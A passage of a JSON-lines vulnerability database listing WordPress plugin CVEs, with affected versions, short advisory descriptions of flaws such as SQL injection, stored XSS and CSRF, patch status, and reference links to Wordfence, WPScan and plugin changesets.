files.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6404476e-0c32-4f8e-882f-6a1785ba5748?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6404476e-0c32-4f8e-882f-6a1785ba5748?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5640","slug":"article-analytics","versionImpact":"1.0","description":"The Article Analytics WordPress plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection vulnerability.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9a383ef5-0f1a-4894-8f78-845abcb5062d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9a383ef5-0f1a-4894-8f78-845abcb5062d\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/devl00p.github.io\\\/posts\\\/Injection-SQL-dans-le-plugin-Wordpress-Article-Analytics\\\/\",\"name\":\"https:\\\/\\\/devl00p.github.io\\\/posts\\\/Injection-SQL-dans-le-plugin-Wordpress-Article-Analytics\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0984","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the disableOptimization function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to disable the image optimization setting.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc9dd55d-3c37-4f24-81a1-fdc8ca284566?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc9dd55d-3c37-4f24-81a1-fdc8ca284566?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0858","slug":"innovs-hr-manager","versionImpact":"1.0.3.4","description":"The Innovs HR WordPress plugin through 1.0.3.4 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as adding them as employees.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f6627a35-d158-495e-9d56-69405cfca221\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f6627a35-d158-495e-9d56-69405cfca221\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0632","slug":"auto-translate","versionImpact":"1.5.4","description":"The Automatic Translator with Google Translate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom font setting in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4727154c-c48f-4958-9520-cc5204927ee4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4727154c-c48f-4958-9520-cc5204927ee4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auto-translate\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auto-translate\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6220","slug":"keydatas","versionImpact":"2.5.2","description":"The ????? (Keydatas) plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the keydatas_downloadImages function in all versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ae7971-7bdf-4369-b04b-fb48ea5b9518?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ae7971-7bdf-4369-b04b-fb48ea5b9518?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/keydatas\\\/trunk\\\/keydatas.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/keydatas\\\/trunk\\\/keydatas.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3399","slug":"cookie-notice","versionImpact":"2.4.17.1","description":"The Cookie Notice & Compliance for GDPR \/ CCPA plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cookie_notice_options[refuse_code_head]' parameter in versions up to, and including, 2.4.17.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrative privileges and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the injected \/wp-admin\/admin.php?page=cookie-notice page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73fd35b4-16b3-4f57-a3e4-46e4de0ee822?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73fd35b4-16b3-4f57-a3e4-46e4de0ee822?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134120\\\/cookie-notice\\\/trunk\\\/includes\\\/settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134120\\\/cookie-notice\\\/trunk\\\/includes\\\/settings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3459","slug":"woocommerce-multiple-free-gift","versionImpact":"1.2.3","description":"The WooCommerce Multiple Free Gift plugin for WordPress is vulnerable to gift manipulation in all versions up to, and including, 1.2.3. This is due to plugin not enforcing server-side checks on the products that can be added as a gift. This makes it possible for unauthenticated attackers to add non-gift items to their cart as a gift.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdb9c321-1a2c-4593-9947-2071a908ee1c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdb9c321-1a2c-4593-9947-2071a908ee1c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-multiple-free-gift\\\/trunk\\\/lib\\\/WFG_Frontend.class.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-multiple-free-gift\\\/trunk\\\/lib\\\/WFG_Frontend.class.php#L189\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11747","slug":"responsive-youtube-videos","versionImpact":"2.1","description":"The Responsive Videos plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'somryv' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-youtube-videos\\\/trunk\\\/includes\\\/somryv-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-youtube-videos\\\/trunk\\\/includes\\\/somryv-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-youtube-videos\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-youtube-videos\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f723be00-79f1-4a24-8502-2c5844ccc5de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f723be00-79f1-4a24-8502-2c5844ccc5de?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13231","slug":"uber-grid","versionImpact":"1.1.7","description":"The WordPress Portfolio Builder \u2013 Portfolio Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'add_video' function in all versions up to, and including, 1.1.7. This makes it possible for unauthenticated attackers to add arbitrary videos to any portfolio gallery.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/tags\\\/1.1.7\\\/src\\\/Admin.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28d9ab98-c1ab-45ee-a371-6598a8347b10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28d9ab98-c1ab-45ee-a371-6598a8347b10?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1672","slug":"notibar","versionImpact":"2.1.5","description":"The Notibar \u2013 Notification Bar for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246799\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246799\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/notibar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/notibar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9985627d-9ba4-4a5b-94fb-06bcc769acfd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9985627d-9ba4-4a5b-94fb-06bcc769acfd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13617","slug":"aoa-downloadable","versionImpact":"0.1.0","description":"The aoa-downloadable WordPress plugin through 0.1.0 doesn't validate a parameter in its download function, allowing unauthenticated attackers to download arbitrary files from the server","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8d6dd979-21ef-4d14-9c42-bbd1d7b65c53\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8d6dd979-21ef-4d14-9c42-bbd1d7b65c53\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13926","slug":"wp-syntax","versionImpact":"1.2","description":"The WP-Syntax WordPress plugin through 1.2 does not properly handle input, allowing an attacker to create a post containing a large number of tags, thereby exploiting a catastrophic backtracking issue in the regular expression processing to cause a DoS.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5f0092e-7cd5-412f-a8ea-7bd4a8bf86d2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5f0092e-7cd5-412f-a8ea-7bd4a8bf86d2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8082","slug":"widgets-reset","versionImpact":"0.1","description":"The Widgets Reset WordPress plugin through 0.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47b2cd60-9ac4-49cf-8ca9-7d90656fc397\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47b2cd60-9ac4-49cf-8ca9-7d90656fc397\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6782","slug":"gozen-forms","versionImpact":"1.1.5","description":"The GoZen Forms plugin for WordPress is vulnerable to SQL Injection via the 'forms-id' parameter of the dirGZActiveForm() function in all versions up to, and including, 1.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gozen-forms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gozen-forms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d874a041-1cd4-4ca1-85bd-4050630d8502?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d874a041-1cd4-4ca1-85bd-4050630d8502?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1870","slug":"yourchannel","versionImpact":"1.2.3","description":"The YourChannel plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on the saveLang function. This makes it possible for unauthenticated attackers to change the plugin's quick language translation settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1cec0b1-b77c-4d21-a3d2-c79fd3250bb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1cec0b1-b77c-4d21-a3d2-c79fd3250bb0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L498\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L498\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0583","slug":"vk-blocks","versionImpact":"1.57.0.5","description":"The VK Blocks plugin for WordPress is vulnerable to improper authorization via the REST 'update_vk_blocks_options' function in versions up to, and including, 1.57.0.5. This allows authenticated attackers, with contributor-level permissions or above, to change plugin settings including default icons.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/App\\\/RestAPI\\\/BlockMeta\\\/class-vk-blocks-entrypoint.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/App\\\/RestAPI\\\/BlockMeta\\\/class-vk-blocks-entrypoint.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12a94f5b-bc30-4a65-b397-54488c836ec3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12a94f5b-bc30-4a65-b397-54488c836ec3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0983","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the enableOptimization function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to enable image optimization.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175dd04d-ce06-45a0-8cfe-14498e2f9198?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175dd04d-ce06-45a0-8cfe-14498e2f9198?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6487","slug":"luckywp-table-of-contents","description":"The LuckyWP Table of Contents plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018Header Title' field in all versions up to and including 2.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88075c15-079f-4de2-8e15-374eb7b8c77b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88075c15-079f-4de2-8e15-374eb7b8c77b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/luckywp-table-of-contents\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/luckywp-table-of-contents\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7703","slug":"armember-membership","versionImpact":"4.0.37","description":"The ARMember \u2013 Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.0.37 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bd057d5-5350-43c9-abfc-34d8f6537d2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bd057d5-5350-43c9-abfc-34d8f6537d2e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/armember-membership\\\/trunk\\\/core\\\/classes\\\/class.arm_members_activity.php#L374\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/armember-membership\\\/trunk\\\/core\\\/classes\\\/class.arm_members_activity.php#L374\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/armember-membership\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/armember-membership\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136475\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136475\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8747","slug":"email-obfuscate-shortcode","versionImpact":"2.0","description":"The Email Obfuscate Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'email-obfuscate' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77bed6ce-84e7-4b71-8acd-bb5b73e362d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77bed6ce-84e7-4b71-8acd-bb5b73e362d2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-obfuscate-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-obfuscate-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9839","slug":"uix-slideshow","versionImpact":"1.6.5","description":"The The Uix Slideshow plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.6.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f189f606-ec30-4f5d-81c9-d526ba7141f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f189f606-ec30-4f5d-81c9-d526ba7141f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uix-slideshow\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uix-slideshow\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uix-slideshow\\\/trunk\\\/includes\\\/shortcodes.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uix-slideshow\\\/trunk\\\/includes\\\/shortcodes.php#L26\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11093","slug":"sg-helper","description":"The SG Helper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in version 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sg-helper\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sg-helper\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9016822f-f167-4225-8216-e74cd687443c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9016822f-f167-4225-8216-e74cd687443c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12140","slug":"ai-addons-for-elementor","versionImpact":"2.2.1","description":"The Elementor Addons AI Addons \u2013 70 Widgets, Premium Templates, Ultimate Elements plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.1 via the render function due to insufficient restrictions on which templates can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft templates that they should not have access to.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-addons-for-elementor\\\/tags\\\/2.2.1\\\/includes\\\/widgets\\\/accordion.php#L958\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-addons-for-elementor\\\/tags\\\/2.2.1\\\/includes\\\/widgets\\\/accordion.php#L958\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-addons-for-elementor\\\/tags\\\/2.2.1\\\/includes\\\/widgets\\\/tab.php#L905\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-addons-for-elementor\\\/tags\\\/2.2.1\\\/includes\\\/widgets\\\/tab.php#L905\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c00d83a7-dd7a-407d-b44e-7ee0a2a1492a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c00d83a7-dd7a-407d-b44e-7ee0a2a1492a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0865","slug":"wp-media-category-management","description":"The WP Media Category Management plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions 2.0 to 2.3.3. This is due to missing or incorrect nonce validation on the wp_mcm_handle_action_settings() function. This makes it possible for unauthenticated attackers to alter plugin settings, such as the taxonomy used for media, the base slug for media categories, and the default media category via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-category-management\\\/tags\\\/2.3.3\\\/include\\\/admin\\\/class-WP_MCM_Render_Settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-category-management\\\/tags\\\/2.3.3\\\/include\\\/admin\\\/class-WP_MCM_Render_Settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-category-management\\\/trunk\\\/include\\\/admin\\\/class-WP_MCM_Settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-category-management\\\/trunk\\\/include\\\/admin\\\/class-WP_MCM_Settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-category-management\\\/trunk\\\/include\\\/class-WP_MCM_Options.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-category-management\\\/trunk\\\/include\\\/class-WP_MCM_Options.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242626\\\/wp-media-category-management\\\/trunk\\\/include\\\/admin\\\/class-WP_MCM_Sett